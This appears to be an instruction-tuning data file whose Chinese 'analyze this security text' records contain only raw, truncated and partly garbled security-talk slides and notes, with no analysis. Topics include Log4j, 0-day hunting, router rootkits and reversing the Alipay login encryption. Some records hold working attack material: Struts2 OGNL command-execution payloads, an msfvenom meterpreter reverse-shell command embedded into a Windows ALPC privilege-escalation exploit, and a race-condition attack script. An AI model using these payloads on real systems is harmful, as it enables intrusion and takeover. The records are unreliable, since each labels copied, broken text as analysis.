{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents AAD Joined Machines - The New Lateral Movement Mor Rubin #BHUSA @BlackHatEvents Who am I?  Mor Rubin (@rubin_mor)  Senior security researcher at Microsoft  Interested in networking, cloud and On-Prem attacks, mitigations and detections #BHUSA @BlackHatEvents Agenda  Introduction to key terms  NegoEx protocol  Attacks  Demo  Hunting  Takeaways #BHUSA @BlackHatEvents Technical background #BHUSA @BlackHatEvents Azure AD Joined device Ref: Dirk-Jan Mollema Im in your cloud reading everyones email Troopers 19 https://dirkjanm.io/assets/raw/TR19-Im%20in%20your%20cloud.pdf #BHUSA @BlackHatEvents AADJ Authenticated Connections AADJ AADJ PRT P2P Certificate #BHUSA @BlackHatEvents Primary Refresh Token - PRT  A JSON Web Token (JWT) for the user and the device it was issued for  Can be compared to Ticket Granting Ticket (TGT)  Can be used to authenticate to any application #BHUSA @BlackHatEvents P2P Azure AD certificate  Certificate that is used for peer-to-peer authentication between Azure AD joined devices  Issued by Azure AD upon request and valid only for 1 hour #BHUSA @BlackHatEvents Kerberos PKINIT Kerberos extension allows certificate authentication over Kerberos instead of hash (password) Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms- kile/b4af186e-b2ff-43f9-b18e-eedb366abf13 #BHUSA @BlackHatEvents PKU2U  Based on Kerberos version 5 messages and the Kerberos GSS-API mechanism.  Implemented as a Security Support Provider (SSP) enables peer-to-peer authentication  Used for authentication in NegoEx when no KDC exists #BHUSA @BlackHatEvents GSSAPI \\ SSPI  SSPI is an API that allows application to add authenticity and privacy layer  It is applicable to any application that allows 'Windows Authentication' Ref: https://docs.microsoft.com/en-us/windows-server/security/windows- authentication/security-support-provider-interface-architecture #BHUSA @BlackHatEvents NegoEx protocol #BHUSA @BlackHatEvents NegoEx Client Server #BHUSA @Bl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n猫 鼠 游 戏 如 何 进 行 W i n d o w s 平 台 在 野 0 d a y 狩 猎 金权 安恒信息 自我介绍  金权@jq0904/银雁冰  安恒信息猎影/卫兵实验室高级安全专家  研究方向  Windows平台漏洞挖掘与利用  Windows平台在野0day狩猎  演讲经历  Black Hat USA 2022  HITB Amsterdam 2021  Blue Hat Shanghai 2019  40+ Microsoft/Adobe CVE致谢 (7次在野0day致谢  2020~2022 MSRC TOP 100 目录 1. 背景 2. 用不同的方法解决不同的问题  为什么沙箱适合狩猎Office在野0day  为什么YARA适合狩猎Windows本地提权在野0day 3. 近两年热门在野0day案例分析  Office在野0day案例分析  Windows本地提权在野0day案例分析 4. 如何培养在野0day狩猎人才 目录 1. 背景 2. 用不同的方法解决不同的问题  为什么沙箱适合狩猎Office在野0day  为什么YARA适合狩猎Windows本地提权在野0day 3. 近两年热门在野0day案例分析  Office在野0day案例分析  Windows本地提权在野0day案例分析 4. 如何培养在野0day狩猎人才 背景 0 10 20 30 40 50 60 70 2018 2019 2020 2021 2022 最近5年全球在野0day披露数量及国内外占比 国内厂商披露 国外厂商披露 主要统计数据来源0day \"In the Wild\" - Project Zero 背景 0 1 2 3 4 5 6 7 8 2018 2019 2020 2021 2022 最近5年中国厂商披露在野0day统计 360 安恒 腾讯 阿里巴巴 奇安信 Shadow Chaser Group 主要统计数据来源0day \"In the Wild\" - Project Zero 背景 0 1 2 3 4 5 6 7 8 2018 2019 2020 2021 2022 我参与披露的在野0day 360 安恒 腾讯 阿里巴巴 奇安信 Shadow Chaser Group 主要统计数据来源0day \"In the Wild\" - Project Zero 目录 1. 背景 2. 用不同的方法解决不同的问题  为什么沙箱适合狩猎Office在野0day  为什么YARA适合狩猎Windows本地提权在野0day 3. 近两年热门在野0day案例分析  Office在野0day案例分析  Windows本地提权在野0day案例分析 4. 如何培养在野0day狩猎人才 Office在野0day漏洞分类  纯Office漏洞  内存破坏漏洞例如CVE-2015-1641近几年此类漏洞攻击逐渐消失  逻辑漏洞沙虫漏洞CVE-2014-4114Moniker系列漏洞CVE-2017-0199等  以Office为载体的其他漏洞  Flash漏洞随着Flash退役而消失  IE浏览器漏洞随着IE退役逐渐减少但攻击面仍在  .NET漏洞CVE-2018-8759个例  Windows系统漏洞CVE-2014-4148等不排除后面还会出现 趋势一逻辑漏洞越来越多 内存漏洞缓解 机制日益完善 内存破坏漏洞 利用逐渐减少 逻辑漏洞 日渐增多 趋势二远程加载漏洞利用的手法越来越流行 2014年 2017年 2018年 2020年 2021年 2022年 CVE-2014-4114 CVE-2017-0199 CVE-2017-8759 CVE-2018-5002 CVE-2018-8174 CVE-2018-15982 CVE-2020-0674 CVE-2021-40444 CVE-2022-30190 为何说沙箱适合狩猎Office在野0day 远程加载利用 成为主流 利用代码云控 具有时效性 沙箱检测 静态提取URL 缺点1RTF代码混淆 缺点2请求时加密 优点模拟实际交互 情况可以做到全过 程记录准确率高 为何说沙箱适合狩猎Office在野0day 逻辑漏洞一般 影响较多版本 沙箱环境制作 工作量较小 只需维护一个常 见Office版本的 全补丁镜像 沙箱能覆盖的Office在野0day狩猎场景 所有以Office为载体的在野0day场景 适用沙箱 狩猎的场景 可行的思路  做一个全补丁Office环境镜像将可疑样本投入沙箱通过异常行为进行过滤  环境制作Windows 10 + Office 2019 (仅供参考)  异常行为  Office进程启动可疑子进程需过滤常见白名单  检测是否有异常地址处的指令访问敏感模块的导", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n端到端流水线驱动DevOps落地 DevOps时代社区 景韵 无关趋势关乎生死 DevOps 2017 年度报告 Continuous Delivery Continuous Integration DevOps Continuous Deployment Lean (End to End Flow) Principles Practices Running Lean Product/Market Fit (Finding&Validating Ideas) Scrum/Kanban (Process) XP (Engineering) Operations Business Software Service Agile(Development/Test) DevOps在整个软件生命周期的位置 s peOA s s p v R S sC -sD s =s 企业级DevOps理论与实践体系标准 流水线驱动DevOps 主要结论  业务对交付频率有较高要求65%的受访者实现了每周一次以上的部署频率  部署频率与部署成功率正相关通过技术手段可以保证价值快速和高质量流动  64%的受访者已经引入持续交付流水线 其中的86%在使用Jenkins  各阶段工具与流水线集成比率低于25%流水线自动触发比率仅有31% 1. 流水线集成很困难  需要端到端整合持续交付流水线  多种工具间有效集成和互联互通 2. 自动化触发比率低 3. 优秀实践应用不全 问题及改进建议 一 问题及改进建议 二 问题及改进建议 三  代码提交自动触发自动化执行  流水线逐层晋级实现内建质量  代码扫描非功能测试灰度发布  分布式配置中心数据库变更管理 DevOps流水线调研结论 张乐石雪峰景韵 流水线核心成员张乐赵舜东景韵石雪峰雷涛李华强孙博 微服务项目 Build Test Deploy  Everything is Container 所有的构建测试部署运行环 境都实现容器化动态生成  Docker in Docker 在通用容器环境中按需拉取任务 所需镜像实现环境标准化 全面拥抱容器化  Slave动态挂载 Jenkins节点通过JNLP协议动态生 成挂载  资源动态调度 容器资源由Kubernetes平台进行 统一调度动态扩容收缩 弹性动态集群  打通需求开发部署流程 JiraGitlabJenkins完美集成 流水线状态自动化同步  插接研发团队内部工具 将自动化测试部署上线集成到流 水线中端到端打通全流程 From KKWhy, What, and How of Continuous Delivery 流水线工具集成 流水线的16个特性 流水线建设路线图 Value Stream Mapping THANKS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJS逆向40分钟视频通杀登陆加密 收录于合集 #JS逆向 4个 介绍 书接上Burpy款流量解密插件 属于配套了 其实这个付宝案例已经发过了我实在是懒得写别的站点章重新录了个通杀的视 频就以付宝为案例讲解了基本秒扣加解密函数视频有百度爱奇艺优酷微 博都简单扣了下分钟搞定家有案例的话也可以私发我 点击下图跳转到视频 或访问: 2022-07-23 12:42 发表于北京 原创 不愿透露姓名的热友 位不愿透露姓名的热友 https://www.bilibili.com/video/BV16d4y1S7Su 键三连啊看官们 下就新发了可以直接忽略不看 站aHR0cHM6Ly93d3cuYWxpcGF5LmNvbS8= f12 network Ctrl+Shift +F 局搜索需要解密的password关键字 多次调试后最终在index.js中的393找到getPassword的法转搜索getPassword声明位 置在index.js中4979地找到声明信息 然后下断点对发包请求内容发现n的内容password字段信息内容n是 e.alipayEncrypt(2,i,t)传过来的所以只需要 return e.alipayEncrypt(2,i,t) n --> e .alipayEncrypt() e --> new s.RSA s -- > ? 先跟进下s.rsa 可以知道s.RSA是个function 跟进s.RSA发现来到了Wi 法名字不样的原因可能是在 上的代码重新赋值了名字不过不重要发现这个法是规定key_size和exponent的 回到getpassword找到加密法e .alipayEncrypt() 发现也是Wi接着发现Wi是从 Gi过来 的.....这种情况下发现加密法和其他js代码在同个js内有万代码的只能费时间选择 性的扣有代码了 回到getPassword法附近找到s是怎么来的在4971找到s = security_crypto_200_index  这时候搜索security_crypto_200_index 把js法扣下来 security_crypto_200_index内容是键值对我们只需要s.RSA也就是 security_crypto_200_lib_rsa security_crypto_200_index = function(t) { return t = { Base64: security_crypto_200_lib_base64, xor: security_crypto_200_lib_xor, RSA: security_crypto_200_lib_rsa } }() 通过crtl+f 搜索相关信息可以找到security_crypto_200_lib_rsa开头结尾这个就是Wi了具 体在哪判断和调试了概为下内容 security_crypto_200_lib_rsa = function(t) { function e(t, e, i) { null != t && (\"number\" == typeof t ? this.fromNumber(t, e, i) : null == e && \"str } ********* ************ ************** **************** return this.key }, Wi.prototype.getPrivateKey = function() { return this.getKey().getPrivateKey() }, Wi.prototype.getPrivateKeyB64 = function() { return this.getKey().getPrivateBaseKeyB64() }, Wi.prototype.getPublicKey = function() { return this.getKey().getPublicKey() }, Wi.prototype.getPublicKeyB64 = function() { return this.getKey().getPublicBaseKeyB64() }, t = Wi }() 根据所需要的法 在不考虑i 变动的情况下调代码剩下的就是和s.RSA样的步骤扣出是 s.Base64 了 function getPassword(pwd) { var s = security_crypto_200_lib_rsa; var e = new s; //var i = security_crypto_200_lib_base64; //s.decode(options.TS); e.setPublicKey(\"MI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Log4j --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- > 项目地址 : https://github.com/apache/logging-log4j2 **相关文章** - [Log4j2系列漏洞分析汇总](https://mp.weixin.qq.com/s/0sqTEQwOZ-TJeqpq-ExWTg) --- ## CVE-2019-17571 log4j<=1.2.17反序列化漏洞 **相关文章** - [log4j<=1.2.17反序列化漏洞CVE-2019-17571分析](https://mp.weixin.qq.com/s/RLvvzKbBwKp-War98pvn9w) --- ## CVE-2021-44228 **描述** 由于 Apache Log4j2 lookup 功能存在递归解析功能攻击者可直接构造恶意请求当程序将用户输入的数据进行日志记录时, 需进特殊配置即可触发远程代码执 Apache Struts2Apache SolrApache DruidApache Flink 等众多组件与大型应用均受影响 **影响范围** - Apache Log4j 2.x < 2.15.0-rc2 - [VMware 多个产品 Log4j2 RCE](https://mp.weixin.qq.com/s/ThSxC22JsrRE50N21WR24Q) - [YfryTchsGD/Log4jAttackSurface](https://github.com/YfryTchsGD/Log4jAttackSurface) - https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 **相关文章** - [Log4j2 RCE分析](https://mp.weixin.qq.com/s/kLuPx0zXRIl6y1ds6n5e_w) - [甲方需谨慎对待log4shell漏洞的修复](https://mp.weixin.qq.com/s/Jaq5NTwqBMX7mKMklDnOtA) - [CVE-2021-44228 log4j2 回显操作](https://www.o2oxy.cn/3893.html) - [一洞一世界一大一团灭翻车的log4j2](https://mp.weixin.qq.com/s/-SV45eVKjCBDDftLC3Pf4Q) - [Apache Log4j2从RCE到RC1绕过](https://mp.weixin.qq.com/s/8lvpSetHUpCCL5IRcvdTCw) - [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package](https://www.lunasec.io/docs/blog/log4j-zero-day/) - [log4j 漏洞一些特殊的利用方式](https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg) - [整理log4j bypass](https://mp.weixin.qq.com/s/Rd8-Atvyaac93ak4Iz8HTQ) - [从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞](https://mp.weixin.qq.com/s/4MP0WVDOT5YhpOJ5KkGxYw) - [Log4j和它的小伙伴们](https://mp.weixin.qq.com/s/VGMxrw8HD2ZbQHpyL-V_nQ) - [Log4j2 研究之lookup](https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg) - [Log4j2 0day 攻击面分析](https://mp.weixin.qq.com/s/-HJ6BqyAsSYpV3_X0ItC2w) - https://github.com/vulhub/vulhub/blob/master/log4j/CVE-2021-44228/README.zh-cn.md **修复方案** - 设置系统环境变量 LOG4J_log4j2_formatMsgNoLookups=True - 升级 Apache Log4j2 所有相关应用到最新版本地址 https://github.com/apache/logging-log4j2/tags - [Cybereason/Logout4Shell](ht", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1  Copyright 2010, National Security Corporation, all rights reserved DEFCON XVIII DEFCON XVIII DEFCON XVIII Tales from the Crypto G. Mark Hardy, CISM, CISA, CISSP National Security Corporation gmhardy@nationalsecurity.com +1 410.933.9333 @g_mark  Copyright 2010, National Security Corporation, all rights reserved 2 DEFCON XVIII DEFCON XVIII DEFCON XVIII Which Would You Like to Hear?  Stories you can look up in the library?  Ways you can win crypto contests?  Copyright 2010, National Security Corporation, all rights reserved 3 DEFCON XVIII DEFCON XVIII DEFCON XVIII Stories I Can Tell You (over a beer )  Life or death by crypto  Military crypto  Military use before WWII  Military ciphers of WWII  American ciphers  Japanese ciphers  German ciphers  Commercial crypto  Early days of crypto  Banking security  eCommerce  Copyright 2010, National Security Corporation, all rights reserved 4 DEFCON XVIII DEFCON XVIII DEFCON XVIII Some Basics: Types of Ciphers  Transposition ciphers  Also known as permutation ciphers  Substitution ciphers  Stream ciphers  Block ciphers  Product and exponentiation ciphers  (advanced; wont cover here)  Copyright 2010, National Security Corporation, all rights reserved 5 DEFCON XVIII DEFCON XVIII DEFCON XVIII Transposition Ciphers 1 2 3 4 A T T A C K A T D A W N ATTACK AT DAWN KEY = {1,2,3,4} KEY = {2,4,3,1} ACD TKATAW ATN TKA ATNTAW ACD  Copyright 2010, National Security Corporation, all rights reserved 6 DEFCON XVIII DEFCON XVIII DEFCON XVIII Substitution Cipher  Caesar Cipher A B C D E F G H I J K L M N O P Q R S T U V W X Y Z D E F G H I J K L M N O P Q R S T U V W X Y Z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z D E F G H I J K L M N O P Q R S T U V W X Y Z A B C ATTACK AT DAWN DWWDFN DW GDZQ  Copyright 2010, National Security Corporation, all rights reserved 7 DEFCON XVIII DEFCON XVIII DEFCON XVIII Substitution Cipher  Vigenère Cipher A B C D E F G H I J K L M N O P Q R S T U V W X Y Z A B C D E F G H I J K L M N O P Q R S T U V W ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1SDL 28Web 3RedHatApacheAmazonWeblogicRCE Weblogic 42015PyconPython2016 VIP2017Java Json ;2018Java PART 01 CONTENTS PART 02 PART 03 PART 04 01 02 03 04 PART 01 1 2 3 1SecurityManager 2 3 SecurityManager PART 02 SecurityMemberAccess <constant name=\"struts.excludedClasses\" value=\" java.lang.Object,java.lang.Runtime,java.lang.System, java.lang.Class,java.lang.ClassLoader,java.lang.Shutdown, java.lang.ProcessBuilder,ognl.OgnlContext,ognl.ClassResolver, ognl.TypeConverter,ognl.MemberAccess, ognl.DefaultMemberAccess, com.opensymphony.xwork2.ognl.SecurityMemberAccess, com.opensymphony.xwork2.ActionContext\" / <constant name=\"struts.excludedPackageNames\" value=\"java.lang.,ognl,javax\" /> 1 2isAccessible 3 struts-default.xml Struts2 S2-001 S2-014 S2-032 S2-045 S2-057 (#p=new java.lang.ProcessBuilder('calc')).(#p.start()) (#_memberAccess['allowStaticMethodAccess']=true) .(@java.lang.Runtime@getRuntime().exec('calc')) (#container=#context['com.opensymphony.xwork2.ActionContext.container']).( #ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@ class)).(#ognlUtil.excludedClasses.clear()).(#ognlUtil.excludedPackageNames.cle ar()).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_AC CESS)).(@java.lang.Runtime@getRuntime().exec('calc')) (#_memberAccess=@ognl.OgnlContext@DEFAULT_ MEMBER_ACCESS).(@java.lang.Runtime@getRuntim e().exec('calc')) S2-045 PAYLOAD ${ (#c=#request['struts.valueStack'].context). (#container=#c['com.opensymphony.xwork2.ActionContext.container'] ). (#o=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUt il@class)). ((#o.getExcludedClasses().clear())). (#o.getExcludedPackageNames().clear()). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#c.setMemberAccess(#dm)).(#cmd=({'calc'})). (new java.lang.ProcessBuilder(#cmd)).start() } S2-057 PAYLOAD public class OgnlContext extends Object implements Map { public static final String CONTEXT_CONTEXT_KEY = \"context\"; public static final String ROOT_CONTEXT_KEY = \"root\"; public static fi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# LeCrypto (crypto 250) ###ENG [PL](#pl-version) In the task we get the code: ```python #!/usr/bin/env python from random import SystemRandom import hashlib import copy_reg, types class RC4: def __init__(self, message, password): self.state = [None] * 256 self.p = None self.q = None self.message = message self.password = [ord(c) for c in password] self.setKey() def setKey(self): key = self.password self.state = [n for n in range(256)] self.p = self.q = j = 0 for i in range(256): if len(key) > 0: j = (j + self.state[i] + key[i % len(key)]) % 256 else: j = (j + self.state[i]) % 256 self.state[i], self.state[j] = self.state[j], self.state[i] def byteGenerator(self): self.p = (self.p + 1) % 256 self.q = (self.q + self.state[self.p]) % 256 self.state[self.p], self.state[self.q] = self.state[self.q], self.state[self.p] return self.state[(self.state[self.p] + self.state[self.q]) % 256] def encrypt(self): return [ord(p)  self.byteGenerator() for p in self.message] def decrypt(self): return \"\".join([chr(c  self.byteGenerator()) for c in self.message]) def _pickle_method(m): if m.im_self is None: return getattr, (m.im_class, m.im_func.func_name) else: return getattr, (m.im_self, m.im_func.func_name) copy_reg.pickle(types.MethodType, _pickle_method) def getRC4From(password, s=\"\", debug=True): if (len(s) == 0): cg = SystemRandom() s = \"\".join([unichr(cg.randrange(32, 126)) for i in range(16)]) h0 = hashlib.md5(password.encode('utf-8')).hexdigest() md5t = \"\".join([unichr(ord(c)) for c in h0[:10]]) # ib = 16 * (md5t + s) h1 = hashlib.md5(ib.encode('utf-8')).hexdigest() h1th = h1[:8] + \"00\" * 4 print(\"h1th \", h1th) hf = hashlib.md5(h1th.encode('utf-8')).hexdigest() return [s, hf] def encrypt(text, password): crypter = RC4(text, password) enc = crypter.encrypt() enc = \"\".join([unichr(c) for c in enc]) return enc def leCrypt(text, password, debug=False): theH = {'s': '', 'v': '', 'vH': ''} cg = SystemRandom() v = \"\".join([unichr(cg.randrange(32, 126)) for i in range(16)]) # 16 bytes", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ALPC bug 0day https://github.com/SandboxEscaper/randomrepo/blob/master/PoCLPE.rar https://www.theregister.co.uk/2018/08/28/windows_0day_pops_up_out_of_span_classstrikenowherespan_twitter/ ## 用法 @sandboxescaper8月28号在推特上发布了Windows的本地版权0day然后被很快的撤回PoC在Github上然后我验证了一下是不是真的确实如此 - 以管理员身份打开Process Explorer - 右键单击以管理员身份运行 ``` https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer ``` - 作为普通用户启动记事本如果从cmd打开它则会在cmd中获得一个子进程此进程使用启动它的用户上下文运行 - PID是3872 - 如果需要在Process Explorer中查看用户名和完整性级别可以转到`查看` - >`选择列`并进行检查. 现在看一下spoolsv.exe进程 使用之前产生的`PID 3872` 再次在Process Explorer中查看spoolsv Bhamconhost和notepad的子进程cmd.exe是SYSTEM权限 ## windows10运行成功 在Windows 10 1803上确认0day priv esc.MS尚未发布补丁28.08.2018 可能会打开一个实际的system权限的cmd窗口 @plaintextg跟我在`session 0`中产生了进程这就是为什么用户看不到会话1中的操作如果在ProcExplorer的面板中切换Session你可以非常清楚地看到 ## Windows Server 2016 测试成功 ## windows7 测试失败 ## 自动化攻击 阅读完源代码后记事本是从添加的资源中启动的这可以在源代码的101-105行看到exploit.dll ``` //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize = ::SizeofResource(mod, myResource); HGLOBAL myResourceData = ::LoadResource(mod, myResource); void* pMyBinaryData = ::LockResource(myResourceData); ``` 点击那个我们可以看到这个exploit.dll在PoC中产生记事本无法读取因为没有在绝对路径中 因此我没有重新编译和修复visual studio的500个错误而是决定使用[CFF Explorer ](https://ntcore.com/?page_id=388) 直接替换dll作为资源更容易这样干之前必须准备好payload ``` msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.16 lport=444 -f dll -o lol.dll ``` 在CFF Explorer中选择Replace Resourceraw然后将`lol.dllALPC-TaskSched-LPE.dll `另存为新文件整个漏洞利用现已嵌入到dll文件中. 所以我们再次触发漏洞等shell弹回来 getshell", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n启明星辰辰ADLab 智能语音设备安全研究 演讲人王启泽 2019 PART 01 背景 目录 CONTENTS PART 02 网络安全 PART 03 语音安全 PART 04 隐私审计 01 02 03 04 PART 01 背景 语音正成为人与设备交互的方式 语音包括相当丰富的信息  性别.年年龄  环境.健康  想法.情绪  籍贯 我们研究的对象 我们关注的点 安全及隐私 PART 02 网络安全 音箱网络架构 云平台 客户端 智能音箱 https/mqtts https/mqtts dlna/蓝牙 智能设备 自定协议 云平台的特权命令 /打开远程shell /更更换语音云服务地址 /system(*) 智能音箱 云平台 客户端 伪造特权命令 智能音箱攻击演示-特权命令 智能音箱攻击演示-设备间通信 当房间里里存在多个音箱时 多个音箱之间需要协商 决定由哪个音箱来响应用户的语音命令 多音箱场景 能量量列列表里里最大的IP 接受语音命令 伪造语音广播 能量量99.00 IP192.168.1.2 攻击者IP192.168.1.3 目标音箱IP192.168.1.2 多音箱场景 设备广播 智能音箱 伪电视 设备伪造 访问设备网址确认设备是目标设备 我要看成龙的电影 我要看成龙的电影 智能音箱 伪电视 设备伪造 漏漏洞洞列列表 漏漏洞洞编号 危害 CNVD-2019-13611CNVD-2019-06254 CNVD-2019-05625CNVD-2019-05626 远程命令执行行远程代码执行行 CNVD-2019-07688CNVD-2019-15526 播放恶意音频 CNVD-2019-12111CNVD-2019-13278 敏敏感信息泄漏漏 CNVD-2019-12775 语音窃听 PART 03 语音及内容安全 语音安全 语音唤醒/声纹识别 声音传播 语音识别/语义理理解 内容 超声波 超声波攻击 听不不到 识别 次声波 人耳可听声 超声波 20hz 20Khz 超声波攻击-演示 1. 笔记本电脑喇喇叭性能的提升 使得攻击者无需额外硬件即 可发出超声波信号 2. 新型的智能手机依然存在问 题 1.基于韵母的攻击 语音识别攻击-基于发音模型的攻击 每个汉字的发音都是由声母韵母两部分构成的 声母部分发音时间短,信号变化剧烈烈; 而韵母部分发音时间长是声带共鸣产生携带了了音节的大部分能量量 韵母是由元音或元音加辅音组成 某唤醒词算法主要根据元音来判断 1.上海海同学(shang hai tong xue) 2.小爱同学(xiao ai tong xue) 唤醒词识别攻击示意 小爱同学 上海海同学 唤醒词识别攻击-演示 声纹识别 语音VAD 声纹数据 库 语音VAD 特征提取算法 有效语音提取 有效语音提取 声纹特征提取 声纹特征提取 特征比对 模式比对算法 声纹录入 声纹识别 常见的声纹算法攻击  拼接合成攻击  样本攻击  持续语速变化攻击  端到端攻击  录音攻击 (D1+D2+D3+D8)/8 (80+80+80+40+40+40+40+40)/8=55 声纹识别攻击-声纹比对算法 黑客声音 声纹验证 执行行 语音命令 声音识别算法攻击-声纹比对算法  声纹识别没有错误次数限制  持续变化语速导致评分标准浮动大  中性的声音得分较高 声纹识别算法-攻击演示 语音命令 敏敏感词 内容安全 获取应答内容 文字转语音 播放 语义识别 内容安全-攻击演示 语音命令 中英文敏敏感 词 内容安全 获取应答内容 文字转语音 播放 语义识别 中英文敏敏感 词 PART 04 隐私审计 隐私权 权利利 内容 用户有权力力决定 哪些他本人的信息可以被收集什什么时候收 集什什么地点收集 用户有权力力了了解和决定 这些数据是如何被收集的这些数据将对谁共 享为什什么要对他人分享如何对他人分享 语音设备使用场景的隐私泄露露 阶段 敏敏感信息 设备注册阶段 地理理位置周边WIfi信息路路由器器 MAC地址WI-FI密码已安装应用 情况短/彩信 设备使用阶段 音频信息通信录设备使用情况 业务的使用情况日志 音视频信 息标号 几种常见的隐私风险 问题点 危害 误唤醒 泄漏漏通话内容 APP权限 泄漏漏通信录等敏敏感信息 日志收集 泄漏漏Wifi密码等信息 API接口 合作厂家可以获得非业务需要的敏敏感 信息 明文通信 泄漏漏用户账户及密码等信息 总结 物物间通信场景更更多 声纹识别算法 公众对隐私的关注度越来越高 需要关注设备间认证的安全 大多商用算法还不不成熟 需要关注设备及数据的隐私保护 感谢 ADLab小伙伴 KCon组委会 谢谢观看 演讲人王启泽 Emailwang_qize@venustech.com.cn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright  2012 Virtual Security Research, LLC. All Rights Reserved. Owning the Network: Adventures in Router Rootkits Michael Coppola Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Who am I? Security Consultant at Virtual Security Research in Boston, MA (we're hiring!) Student at Northeastern University Did some stuff, won some CTFs http://poppopret.org/ Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. How did this all start? .npk packages on MikroTik routers Install new features  SOCKS proxy  VPN  IPv6 support  XEN/KVM virtualization Potentially get a shell? Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Router Firmware Upgrade Feature Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. The Big Question Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Can a universal process be developed to modify SOHO router firmware images to deploy malicious code without altering the interface or functionality of the device? Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Can a universal process be developed to modify SOHO router firmware images to deploy malicious code without altering the interface or functionality of the device? ...a rootkit of sorts? Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Intentions Share my personal experience pursuing the topic and the challenges encountered Gain better insight into router internals Release some code Pop some shells Pwn some devices Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Prior Work OpenWRT/DD-WRT  Custom firmware, reverse engineering, hardware / firmware profiling firmware-mod-kit  De/reconstruction of firmware images devttys0.com  Firmware modding, reverse engineering, and exploitation Copyright  2012 Virtual Security Research, LLC. All Rights Reserved. Use Cases Default/weak credentials on admin panel RCE/auth bypass vulnerability CSRF file upload Copyright ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Race Condition > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. ## Summary - [Race Condition](#race-condition) - [Summary](#summary) - [Tools](#tools) - [Turbo Intruder Examples](#turbo-intruder-examples) - [Turbo Intruder 2 Requests Examples](#turbo-intruder-2-requests-examples) - [References](#references) ## Tools * [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) ## Turbo Intruder Examples 1. Send request to turbo intruder 2. Use this python code as a payload of the turbo intruder ```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=30, pipeline=False ) for i in range(30): engine.queue(target.req, i) engine.queue(target.req, target.baseInput, gate='race1') engine.start(timeout=5) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req) ``` 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 4. Click \"Attack\" ## Turbo Intruder 2 Requests Examples This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. ```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=100, pipeline=False ) request1 = ''' POST /target-URI-1 HTTP/1.1 Host: <REDACTED> Cookie: session=<REDACTED> parameterName=parameterValue ''' request2 = ''' GET /target-URI-2 HTTP/1.1 Host: <REDACTED> Cookie: session=<REDACTED> ''' engine.queue(request1, gate='ra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Cavalry Isnt Coming Starting the Revolution to FSCK it all! Nicholas J. Percoco & Joshua Corman @c7five @joshcorman Introductions Introductions @c7five Introductions @c7five @joshcorman Backwards & Forward Ive Had Dreams Ive Had Dreams Nightmares Dangerous Precedents Hitting Rock Bottom Hitting Rock Bottom The Value of Uncomfortable Experimentation Uncomfortable Experimentation Radically Chain of Influence Chain of Influence Fuzzing the Hacking Our Future Hacking Our Future Hacking Our Future Hacking Our Future  If We Can Hack [X], We Can Hack This. Hacking Our Future  If We Can Hack [X], We Can Hack This.  Jailbreaking the System Hacking Our Future  If We Can Hack [X], We Can Hack This.  Jailbreaking the System  Best Social Engineers on the Planet Hacking Our Future  If We Can Hack [X], We Can 